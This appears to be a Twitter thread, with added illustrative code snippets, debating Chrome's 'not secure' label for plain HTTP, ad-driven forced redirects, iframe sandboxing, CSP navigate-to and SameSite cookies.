This doesn't preclude the browser or other user agents being able to make whatever choices it wants; those decisions just shouldn't be tied to search, advertising, targeting, or other markets where Google has a monopoly presence.
And the way this connects to "insecure" is that Google's user agents have never identified Google's advertising products as insecure even when they are demonstrably so. Which raises the question of how Google's economic and security interests interact.
Citation needed that this has never happened. Hosting e.g. ads independent of source that contain malware would lead to flagging on the safe browsing list.
I'm still stuck on the idea that something which once served a buggy thing, must be marked as "not secure" forever more. Are you proposing this for just Google ads, or everything including Glitch?
You’re conflating content people create with content injected into other sites. The question here is how the definition of “insecure” intersects with authority over content. If Glitch inserted insecure content into sites, sure. But users have authority over their Glitch sites.
And you seem to be conflating intentionally serving content over an insecure underlying protocol (which all security folks agree is awful for multiple reasons) with bugs/attacks on content which were fixed
Are you saying it's not currently possible to buy an ad on Google's current infrastructure which can redirect users to an insecure site?
I'm pretty confident it'd be blocked in Chrome due to the user interaction requirement, but I'd still be very disappointed if an ad could get that far.
If so, that's a big change from a few months ago, and not one that's been communicated widely. Publishers I talk to still fear their mobile users getting redirected to spam sites.
Then that's something for Google ads to address. Personally, with my web hat on (it's my favourite hat), I'm happy that an infraction like that gave them a good kicking trust-wise. They deserved it.
I think that’s a lot of this — inside Google, you all (understandably!) see all these things as very separate. Outside? It’s one company, and these things are connected.
True, but on the plus side I feel free spending company time on something that improves users' privacy and security, even if it makes things "harder" for another Google team.
I'd appreciate background about impact to Anil's firm, ballpark hosting costs+examples of active sites that can't move to HTTPS. Archive static sites can stay as zipped DL. I have no affiliation with Google. Agree with @konklone and @benadida on this one.
My point here wasn’t to make you defensive. It was to talk about the conflation of security concerns with economic interests. But your example illustrates my point — yes, Google could unilaterally destroy our business using security as a pretense, which is the issue.
I don't think we've established that this is an unreasonable financial cost.
Isn't this use case addressed by CSP's `navigate-to` directive? Seems to be mentioned up high in the use-cases /cc @mikewest
That doesn't *really* help here if you have to e.g. whitelist your ad provider's open redirect. allow-top-navigation-by-user-activation is what helps here. Browsers *should* make that the default if they e.g. detect something might be an ad IMO (might be the case already).
`navigate-to` can help folks ensure that when you click on an ad, you land on the landing page they think you ought to land on. It's addressing a different problem than forced navigation in general.
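The two mechanisms being contrasted above can be sketched side by side. Assumptions: a hypothetical ad origin `ads.example` and landing page `landing.example`; note `navigate-to` was a CSP proposal and is not broadly shipped, while `allow-top-navigation-by-user-activation` is a standard iframe sandbox token:

```python
# Sketch of the two knobs discussed above, as markup/header strings.

# 1. A sandboxed ad iframe that can only navigate the top-level page
#    in response to a user gesture (blocks silent forced redirects):
ad_iframe = (
    '<iframe src="https://ads.example/slot1" '
    'sandbox="allow-scripts allow-top-navigation-by-user-activation">'
    "</iframe>"
)

# 2. A (proposed) CSP directive constraining where navigation may land,
#    i.e. "clicks on this page should end up on the expected landing page":
csp_header = "Content-Security-Policy: navigate-to 'self' https://landing.example"

print(ad_iframe)
print(csp_header)
```

As the thread notes, the sandbox token addresses forced navigation in general, while `navigate-to` addresses where a legitimate click is allowed to go.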
Are redirects restricted?
I don't think the intervention distinguishes between redirected and direct navigations. I believe it just prevents the initiation of navigation in the first place.
echoes of the samesite strict vs lax argument. Restricting redirects is safer but may be too strict for some uses.
I personally think that the “nothing must break” approach is hurting the web. Developers will have to fix some things.
I'm willing to implement samesite=lax in my browser if it gets me samesite=strict in other browsers.
Only in conjunction with embedded enforcement, which I think folks in ads are experimenting with at the moment.
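The samesite strict vs lax trade-off referenced above shows up as a one-word difference in the `Set-Cookie` header (hypothetical cookie name and value): `Strict` never sends the cookie on cross-site requests, while `Lax` still sends it on top-level navigations so that following a link to the site keeps you logged in.

```python
# Sketch: the SameSite attribute on a session cookie.
# Strict: cookie omitted on ALL cross-site requests, including clicking
#         a link from another site (safer, but can log users "out").
strict_cookie = "Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict"

# Lax: cookie still sent on top-level GET navigations, omitted on
#      cross-site subresource and POST requests (the looser default).
lax_cookie = "Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax"

print(strict_cookie)
print(lax_cookie)
```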
DoubleClick for Publishers is, for better or worse, an arbitrary content hosting system similar to Glitch. People can put bad stuff on it, and, even worse, delegate to arbitrary third parties to put bad stuff on their site. Long term plan to fix it
But what about the ads? – Malte Ubl – Medium
This is the story about how AMP came to build a user-experience-first ecosystem for advertising on the web.
Was the NYT flagged while these ads ran? I’m asking genuinely.
Here's the thing about these intrusive spam ads: When readers encounter them, they can't see your site & can't trust its content. This means YOUR WEBSITE IS DOWN. Your revenue team may be well-intentioned, but your ad provider is taking your site offline. Where's the post-mortem?
Anil Dash on Twitter
“It’s exciting to see every major media outlet covering this same important story on their mobile websites.”
That wouldn't have been the process. The offending script would have been blocked, or the redirected-to page would have. I'd have preferred the former.
It might have if it wasn’t fixed promptly. The Chrome team has implemented the allow-top-navigation-by-user-activation (And my team has implemented this in WebKit, shipping in Safari 12), so that ads cannot do this in the future.
Regardless of this, I don't see why we (and other browsers, since this is universally agreed) can't call plain HTTP "not secure". There are other things we can look at calling "not secure", sure, but why not plain HTTP?
This ignores, again, that the HTTPS requirements are defined in the fetch spec, and have cross-browser agreement. This isn't a thing Chrome has pushed alone.
Labeling them insecure is correct, downranking them in search result is (arguably) incorrect
Security isn't just about what the site collects, though. With bare HTTP, everyone in the middle (like your ISP) has access to your complete browsing history. That can be just as important for an old static site as a new one.
Just a few days ago, I was in a cafe whose wifi provider was deep-inspecting and occasionally altering DNS lookups. (Discovered after some fun debugging) This isn't a random risk.
Wow. What tipped you off to explore further?
A unittest was failing because a bad DNS name was resolving instead of erroring out.
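The detection trick described above (a name that should fail to resolve comes back with an address) can be sketched as a small check. The resolver is passed in as a callable so the logic can be exercised without touching the network; `.invalid` is a reserved TLD that must never resolve:

```python
# Sketch: detect a resolver that wildcard-hijacks nonexistent names.
import secrets
from typing import Callable, Optional


def dns_looks_hijacked(resolve: Callable[[str], Optional[str]]) -> bool:
    """Return True if a random, guaranteed-nonexistent name resolves.

    `resolve` should return an IP string, or None for NXDOMAIN.
    """
    bogus = f"{secrets.token_hex(8)}.invalid"  # reserved: must never resolve
    return resolve(bogus) is not None


# An honest resolver returns NXDOMAIN (None here) for garbage names:
assert dns_looks_hijacked(lambda name: None) is False
# A tampering resolver answers everything, e.g. with an ad server's IP:
assert dns_looks_hijacked(lambda name: "203.0.113.7") is True
```

In practice you'd wire `resolve` to a real lookup (e.g. `socket.getaddrinfo` wrapped to return None on failure) and run the check when joining an untrusted network.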
A clear reason to avoid unit testing. :)
In 2004 my Windows laptop was infected by a virus transmitted through the wifi in a hotel I was staying at.
Not if that site has information about, say, Tiananmen Square.
we could call it 'unsecured' ?
I'll have a problem with this if Chrome starts *blocking* HTTP pages. But merely saying (even static) HTTP pages are "Insecure" is entirely accurate. Every page you visit can be logged and modified by any number of unknown third parties. As a user, I deserve to know this.
Just use TOR, it's very simple. Also learn about self sovereign ID tools